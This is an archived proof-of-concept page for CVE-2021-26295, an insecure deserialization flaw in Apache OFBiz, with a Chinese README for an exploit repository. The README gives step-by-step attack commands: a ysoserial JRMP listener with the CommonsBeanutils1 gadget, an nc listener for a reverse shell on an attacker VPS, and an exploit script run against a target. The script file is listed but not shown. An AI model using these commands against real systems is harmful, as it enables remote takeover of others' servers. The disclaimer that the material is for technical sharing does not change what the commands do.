CVE-2021-26295 PoC — Apache OFBiz 代码问题漏洞

Source

https://github.com/dskho/CVE-2021-26295

Associated Vulnerability

Title:Apache OFBiz 代码问题漏洞 (CVE-2021-26295)
Description:Apache OFBiz是美国阿帕奇（Apache）基金会的一套企业资源计划（ERP）系统。该系统提供了一整套基于Java的Web应用程序组件和工具。 Apache OFBiz prior to 17.12.06 存在安全漏洞，该漏洞源于不安全的反序列化，攻击者可利用该漏洞可以完全控制Apache OFBiz系统。

Description

CVE-2021-26295 EXP 可成功反弹Shell

Readme

# CVE-2021-26295

**CVE-2021-26295 EXP 可成功反弹Shell**

> **本文以及工具仅限技术分享，严禁用于非法用途，否则产生的一切后果自行承担。**

### 触发命令执行EXP



#### 1. VPS启动`RMI`监听 `9999` 端口

```shell
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[要执行的命令]'
```

#### 2. VPS启动`nc`监听 `64444` 端口

```shell
nc -lvp 64444
```

#### 3. 执行python脚本

```shell
python3 cve-2021-26295_exp.py <target> <vps_ip> <vps_port>
```



#### 示例

![1616580076993](img/1616580076993.png)

![1616580247015](img/1616580247015.png)

File Snapshot


 [4.0K]  /data/pocs/0c0cd8917bb51ad19663141fdf240e46747b5d48
├── [2.5K]  cve-2021-26295_exp.py
├── [4.0K]  img
│   ├── [ 40K]  1616580076993.png
│   └── [158K]  1616580247015.png
└── [ 635]  README.md

1 directory, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!